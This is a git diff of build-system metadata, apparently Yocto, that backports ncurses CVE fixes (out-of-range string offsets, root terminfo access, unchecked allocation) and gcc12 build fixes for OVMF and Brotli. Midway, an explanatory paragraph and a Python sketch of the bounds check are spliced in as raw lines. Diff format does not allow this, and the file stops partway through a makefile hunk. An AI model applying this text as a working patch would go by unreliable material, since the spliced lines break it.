+Upstream-Status: Backport
+[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
+
+Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
+Signed-off-by: Dan Tran <dantran@microsoft.com>
+---
+ ncurses/tinfo/alloc_entry.c | 14 ++++++--------
+ ncurses/tinfo/read_entry.c | 25 +++++++++++++++++++------
+ 2 files changed, 25 insertions(+), 14 deletions(-)
+
+diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
+index 4bf7d6c8..b49ad6aa 100644
+--- a/ncurses/tinfo/alloc_entry.c
++++ b/ncurses/tinfo/alloc_entry.c
+@@ -48,13 +48,11 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
+
+ #define ABSENT_OFFSET -1
+ #define CANCELLED_OFFSET -2
+
+-#define MAX_STRTAB 4096 /* documented maximum entry size */
+-
+ static char *stringbuf; /* buffer for string capabilities */
+ static size_t next_free; /* next free character in stringbuf */
+
+@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
+ }
+ #endif
+
+- if (stringbuf == 0)
+- TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
++ if (stringbuf == NULL)
++ TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
+
+ next_free = 0;
+
+@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
+ * Cheat a little by making an empty string point to the end of the
+ * previous string.
+ */
+- if (next_free < MAX_STRTAB) {
++ if (next_free < MAX_ENTRY_SIZE) {
+ result = (stringbuf + next_free - 1);
+ }
+- } else if (next_free + len < MAX_STRTAB) {
+- _nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
++ } else if (next_free + len < MAX_ENTRY_SIZE) {
++ _nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
+ DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
+ DEBUG(7, ("at location %d", (int) next_free));
+ next_free += len;
+diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
+index 5b570b0f..23c2cebc 100644
+--- a/ncurses/tinfo/read_entry.c
++++ b/ncurses/tinfo/read_entry.c
+@@ -1,5 +1,5 @@
+ /****************************************************************************
+- * Copyright 2018-2019,2020 Thomas E. Dickey *
++ * Copyright 2018-2021,2022 Thomas E. Dickey *
+ * Copyright 1998-2016,2017 Free Software Foundation, Inc. *
+ * *
+ * Permission is hereby granted, free of charge, to any person obtaining a *
+@@ -42,7 +42,7 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
+
+ #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
+
+@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ {
+ int i;
+ char *p;
++ bool corrupt = FALSE;
+
+ for (i = 0; i < count; i++) {
+ if (IS_NEG1(buf + 2 * i)) {
+@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ } else if (MyNumber(buf + 2 * i) > size) {
+ Strings[i] = ABSENT_STRING;
+ } else {
+- Strings[i] = (MyNumber(buf + 2 * i) + table);
+- TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
++ int nn = MyNumber(buf + 2 * i);
++ if (nn >= 0 && nn < size) {
++ Strings[i] = (nn + table);
++ TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
++ _nc_visbuf(Strings[i])));
++ } else {
++ if (!corrupt) {
++ corrupt = TRUE;
++ TR(TRACE_DATABASE,
++ ("ignore out-of-range index %d to Strings[]", nn));
++ _nc_warning("corrupt data found in convert_strings");
++ }
++ Strings[i] = ABSENT_STRING;
++ }
+ }
+
+ /* make sure all strings are NUL terminated */
+@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
+ * looking for compiled (binary) terminfo data.
+ *
+ * cgetent uses a two-level lookup. On the first it uses the given
+- * name to return a record containing only the aliases for an entry.
++ * name to return a record containing only the aliases for an entry.
+ * On the second (using that list of aliases as a key), it returns the
+ * content of the terminal description. We expect second lookup to
+ * return data beginning with the same set of aliases.
+@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
+ #endif /* NCURSES_USE_DATABASE */
+
+ /*
+- * Find and read the compiled entry for a given terminal type, if it exists.
++ * Find and read the compiled entry for a given terminal type, if it exists.
+ * We take pains here to make sure no combination of environment variables and
+ * terminal type name can be used to overrun the file buffer.
+ */
+--
+2.36.1
+
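The essence of the fix above is that an offset read from untrusted compiled terminfo data is now validated against the string-table size before it is dereferenced. A rough Python equivalent of that check, purely illustrative and not the ncurses API:

def convert_strings(offsets, table):
    # Offsets come from untrusted input; only dereference the ones that
    # actually point inside the string table, treat the rest as absent.
    strings = []
    for off in offsets:
        if 0 <= off < len(table):
            end = table.find(b"\0", off)   # capabilities are NUL terminated
            strings.append(table[off:end] if end != -1 else table[off:])
        else:
            strings.append(None)           # ABSENT_STRING
    return strings

print(convert_strings([0, 3, 4096], b"am\0xenl\0"))
# [b'am', b'xenl', None]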
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-29491.patch b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
new file mode 100644
index 0000000000..0a0497723f
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+Author: Sven Joachim <svenjoac@gmx.de>
+Description: Change the --disable-root-environ configure option behavior
+ By default, the --disable-root-environ option forbids programs run by
+ the superuser from loading custom terminfo entries. This patch changes
+ that to only restrict programs running with elevated privileges,
+ matching the behavior of the --disable-setuid-environ option
+ introduced in the 20230423 upstream patchlevel.
+Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
+Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
+Forwarded: not-needed
+Last-Update: 2023-05-01
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
+CVE: CVE-2023-29491
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ ncurses/tinfo/access.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+--- a/ncurses/tinfo/access.c
++++ b/ncurses/tinfo/access.c
+@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
+ NCURSES_EXPORT(int)
+ _nc_env_access(void)
+ {
++ int result = TRUE;
++
+ #if HAVE_ISSETUGID
+ if (issetugid())
+- return FALSE;
++ result = FALSE;
+ #elif HAVE_GETEUID && HAVE_GETEGID
+ if (getuid() != geteuid()
+ || getgid() != getegid())
+- return FALSE;
++ result = FALSE;
+ #endif
+- /* ...finally, disallow root */
+- return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
++ return result;
+ }
+ #endif
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
+Fix for CVE-2023-50495 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
+
+Reference:
+https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
+
+Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
+Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
+CVE: CVE-2023-50495
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
+ 1 file changed, 16 insertions(+), 7 deletions(-)
+
+diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
+index 23574b66..56ba9ae6 100644
+--- a/ncurses/tinfo/parse_entry.c
++++ b/ncurses/tinfo/parse_entry.c
+@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ /* Well, we are given a cancel for a name that we don't recognize */
+ return _nc_extend_names(entryp, name, STRING);
+ default:
+- return 0;
++ return NULL;
+ }
+
+ /* Adjust the 'offset' (insertion-point) to keep the lists of extended
+@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ for (last = (unsigned) (max - 1); last > tindex; last--)
+
+ if (!found) {
++ char *saved;
++
++ if ((saved = _nc_save_str(name)) == NULL)
++ return NULL;
++
+ switch (token_type) {
+ case BOOLEAN:
+ tp->ext_Booleans++;
+@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ TYPE_REALLOC(char *, actual, tp->ext_Names);
+ while (--actual > offset)
+ tp->ext_Names[actual] = tp->ext_Names[actual - 1];
+- tp->ext_Names[offset] = _nc_save_str(name);
++ tp->ext_Names[offset] = saved;
+ }
+
+ temp.nte_name = tp->ext_Names[offset];
+@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
+ bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
+ if (is_use || is_tc) {
++ char *saved;
++
+ if (!VALID_STRING(_nc_curr_token.tk_valstring)
+ || _nc_curr_token.tk_valstring[0] == '\0') {
+ _nc_warning("missing name for use-clause");
+@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ _nc_curr_token.tk_valstring);
+ continue;
+ }
+- entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
+- entryp->uses[entryp->nuses].line = _nc_curr_line;
+- entryp->nuses++;
+- if (entryp->nuses > 1 && is_tc) {
+- BAD_TC_USAGE
++ if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
++ entryp->uses[entryp->nuses].name = saved;
++ entryp->uses[entryp->nuses].line = _nc_curr_line;
++ entryp->nuses++;
++ if (entryp->nuses > 1 && is_tc) {
++ BAD_TC_USAGE
++ }
+ }
+ } else {
+ /* normal token lookup */
+--
+2.25.1
+
diff --git a/meta/recipes-core/ncurses/files/config.cache b/meta/recipes-core/ncurses/files/config.cache
deleted file mode 100644
index 6a9217d5bb..0000000000
--- a/meta/recipes-core/ncurses/files/config.cache
+++ /dev/null
@@ -1,4 +0,0 @@
-#! /bin/sh
-
-cf_cv_func_nanosleep=yes
-cf_cv_func_mkstemp=yes
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index 4156bf4f7d..ee0b15ecf0 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,10 +13,11 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
inherit autotools binconfig-disabled multilib_header pkgconfig
# Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
EXTRA_AUTORECONF = "-I m4"
-CONFIG_SITE =+ "${WORKDIR}/config.cache"
+
+CACHED_CONFIGUREVARS = "cf_cv_func_nanosleep=yes"
EXTRASITECONFIG = "CFLAGS='${CFLAGS} -I${SYSROOT_DESTDIR}${includedir}'"
@@ -306,7 +307,7 @@ FILES_${PN}-tools = "\
"
# 'reset' is a symlink to 'tset' which is in the 'ncurses' package
-RDEPENDS_${PN}-tools = "${PN}"
+RDEPENDS_${PN}-tools = "${PN} ${PN}-terminfo-base"
FILES_${PN}-terminfo = "\
${datadir}/terminfo \
@@ -318,3 +319,8 @@ FILES_${PN}-terminfo-base = "\
RSUGGESTS_${PN}-libtinfo = "${PN}-terminfo"
RRECOMMENDS_${PN}-libtinfo = "${PN}-terminfo-base"
+
+# Putting terminfo into the sysroot adds around 2800 files to
+# each recipe specific sysroot. We can live without this, particularly
+# as many recipes may have native and target copies.
+SYSROOT_DIRS_remove = "${datadir}"
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index 723e685a9b..dbff149f55 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -2,12 +2,16 @@ require ncurses.inc
SRC_URI += "file://0001-tic-hang.patch \
file://0002-configure-reproducible.patch \
- file://config.cache \
+ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+ file://CVE-2021-39537.patch \
+ file://CVE-2022-29458.patch \
+ file://CVE-2023-29491.patch \
+ file://CVE-2023-50495.patch \
"
# commit id corresponds to the revision in package version
SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
S = "${WORKDIR}/git"
-EXTRA_OECONF += "--with-abi-version=5 --cache-file=${B}/config.cache"
+EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
# This is needed when using patchlevel versions like 6.1+20181013
diff --git a/meta/recipes-core/os-release/os-release.bb b/meta/recipes-core/os-release/os-release.bb
index a29d678125..33f75e39b8 100644
--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
# Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
# HOME_URL SUPPORT_URL BUG_REPORT_URL
-OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME"
+OS_RELEASE_FIELDS = "\
+ ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
+"
OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
ID = "${DISTRO}"
diff --git a/meta/recipes-core/ovmf/ovmf-shell-image.bb b/meta/recipes-core/ovmf/ovmf-shell-image.bb
index 0d2b8bf52f..fd4fb5b732 100644
--- a/meta/recipes-core/ovmf/ovmf-shell-image.bb
+++ b/meta/recipes-core/ovmf/ovmf-shell-image.bb
@@ -1,4 +1,5 @@
DESCRIPTION = "boot image with UEFI shell and tools"
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# For this image recipe, only the wic format with a
# single vfat partition makes sense. Because we have no
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..4418d52898
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
+From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:34 +0800
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+GenFfs.c:545:5: error: pointer ‘InFileHandle’ used after ‘fclose’ [-Werror=use-after-free]
+ 545 | Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+GenFfs.c:544:5: note: call to ‘fclose’ here
+ 544 | fclose (InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
+ BaseTools/Source/C/GenSec/GenSec.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
+index 949025c33325..d78d62ab3689 100644
+--- a/BaseTools/Source/C/GenFfs/GenFfs.c
++++ b/BaseTools/Source/C/GenFfs/GenFfs.c
+@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
+diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
+index d54a4f9e0a7d..b1d05367ec0b 100644
+--- a/BaseTools/Source/C/GenSec/GenSec.c
++++ b/BaseTools/Source/C/GenSec/GenSec.c
+@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..a6ef87aa79
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
+From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Tue, 10 Jan 2023 06:15:00 -1000
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+Sdk/C/LzmaEnc.c: In function ‘LzmaEnc_CodeOneMemBlock’:
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ‘outStream’ in ‘*p.rc.outStream’ [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ‘outStream’ declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ‘pp’ declared here
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ‘outStream’ in ‘*(CLzmaEnc *)pp.rc.outStream’ [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ‘outStream’ declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ‘pp’ declared here
+cc1: all warnings being treated as errors
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+index e281716fee..b575c4f888 100644
+--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
++++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
+
+ nowPos64 = p->nowPos64;
+ RangeEnc_Init(&p->rc);
+- p->rc.outStream = &outStream.vt;
+
+ if (desiredPackSize == 0)
+ return SZ_ERROR_OUTPUT_EOF;
+
++ p->rc.outStream = &outStream.vt;
+ res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);
++ p->rc.outStream = NULL;
+
+ *unpackSize = (UInt32)(p->nowPos64 - nowPos64);
+ *destLen -= outStream.rem;
+--
+2.25.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
new file mode 100644
index 0000000000..73a432684c
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
+From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:36 +0800
+Subject: [PATCH] Basetools: turn off gcc12 warning
+
+In function ‘SetDevicePathEndNode’,
+ inlined from ‘FileDevicePath’ at DevicePathUtilities.c:857:5:
+DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
+ 321 | memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In file included from UefiDevicePathLib.h:22,
+ from DevicePathUtilities.c:16:
+../Include/Protocol/DevicePath.h: In function ‘FileDevicePath’:
+../Include/Protocol/DevicePath.h:51:9: note: destination object ‘Type’ of size 1
+ 51 | UINT8 Type; ///< 0x01 Hardware Device Path.
+ | ^~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
+index 7ca08af9662d..b05d2bddfa68 100644
+--- a/BaseTools/Source/C/DevicePath/GNUmakefile
++++ b/BaseTools/Source/C/DevicePath/GNUmakefile
+@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o DevicePathUtili
+
+ include $(MAKEROOT)/Makefiles/app.makefile
+
++# gcc 12 trips over device path handling
++BUILD_CFLAGS += -Wno-error=stringop-overflow
++
+ LIBS = -lCommon
+ ifeq ($(CYGWIN), CYGWIN)
+ LIBS += -L/lib/e2fsprogs -luuid
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
new file mode 100644
index 0000000000..d658123b81
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+
+ BrotliDecoderResult BrotliDecoderDecompress(
+- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+- uint8_t* decoded_buffer) {
++ size_t encoded_size,
++ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++ size_t* decoded_size,
++ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+ BrotliDecoderState s;
+ BrotliDecoderResult result;
+ size_t total_out = 0;
+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+
+ BROTLI_BOOL BrotliEncoderCompress(
+ int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+- const uint8_t* input_buffer, size_t* encoded_size,
+- uint8_t* encoded_buffer) {
++ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++ size_t* encoded_size,
++ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+ BrotliEncoderState* s;
+ size_t out_size = *encoded_size;
+ const uint8_t* input_start = input_buffer;
+--
+2.31.1
+
diff --git a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
index 6ecb23b29f..c32963a807 100644
--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
-From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001
+From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Thu, 9 Jun 2016 02:23:01 -0700
-Subject: [PATCH 1/5] ovmf: update path to native BaseTools
+Subject: [PATCH 1/4] ovmf: update path to native BaseTools
BaseTools is a set of utilities to build EDK-based firmware. These utilities
are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
source edksetup.sh BaseTools
else
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
-From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001
+From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Fri, 26 Jul 2019 17:34:26 -0400
-Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake
+Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
Prepend the build flags with those of bitbake. This is to build
using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
Upstream-Status: Pending
---
- BaseTools/Source/C/Makefiles/header.makefile | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
+ BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
-index 4e9b36d98b..eb03ee33fa 100644
+index 1c105ee7d4..d5eea3864e 100644
--- a/BaseTools/Source/C/Makefiles/header.makefile
+++ b/BaseTools/Source/C/Makefiles/header.makefile
-@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH)
+@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
endif
